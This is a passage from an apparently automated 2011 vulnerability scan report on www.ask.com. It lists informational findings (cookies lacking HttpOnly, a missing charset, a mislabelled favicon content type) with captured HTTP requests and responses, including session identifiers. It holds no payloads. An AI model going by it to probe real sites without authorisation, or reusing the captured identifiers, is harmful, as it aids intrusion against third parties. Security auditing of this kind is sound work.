There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



7.1. http://www.ask.com/about/legal/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; qc=0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA2LVVUQw%3D%3D&po=0&pp=dir; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllOgpcQKMAAFY@qX8AAAEd
from-tr: trafrt011iad.io.askjeeves.info
Cache-Control: private
Content-Length: 46328
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:11 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Privacy Policy</title>


<link href="http
...[SNIP]...

7.2. http://www.ask.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllCApcQXAAAHyEWgcAAABd
from-tr: trafrt002iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77175
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:20 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:20 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...

7.3. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: Tklk8ApcQKMAAFY@f2wAAAEE
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 115264
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:56 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...

7.4. http://www.ask.com/products/display  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /products/display

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/display HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjUxLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllMQpcQKMAAFY@o5AAAAEL
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 39615
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:01 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:01 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>Advertise - Ask.com</title>


<link href="http://www.ask
...[SNIP]...

7.5. http://www.ask.com/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...

7.6. http://www.ask.com/web  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkhQpcQDoAAAxvduAAAAL7
from-tr: trafrt010iad.io.askjeeves.info
Content-Length: 109507
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:25:09 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI1OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:25:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...

8. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /display.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x100&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x100;pos=mr2;log=0;s=as;hhi=159;test=0;ord=1313432642381? HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
ETag: W/"4842-1313089226000"
Last-Modified: Thu, 11 Aug 2011 19:00:26 GMT
Content-Type: text/html
Content-Length: 4842
tr-request-id: TkUERgpcQXAAACOEDc8AAAJW
from-tr: trafrt002iad.io.askjeeves.info
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:24:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;

...[SNIP]...

9. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ask.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
Content-Length: 1150
Last-Modified: Tue, 03 May 2011 18:31:14 GMT
ETag: "233e26-47e-4a2635850e080"
Accept-Ranges: bytes
Date: Mon, 15 Aug 2011 18:28:03 GMT
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

Report generated by XSS.CX at Mon Aug 15 12:31:16 GMT-06:00 2011.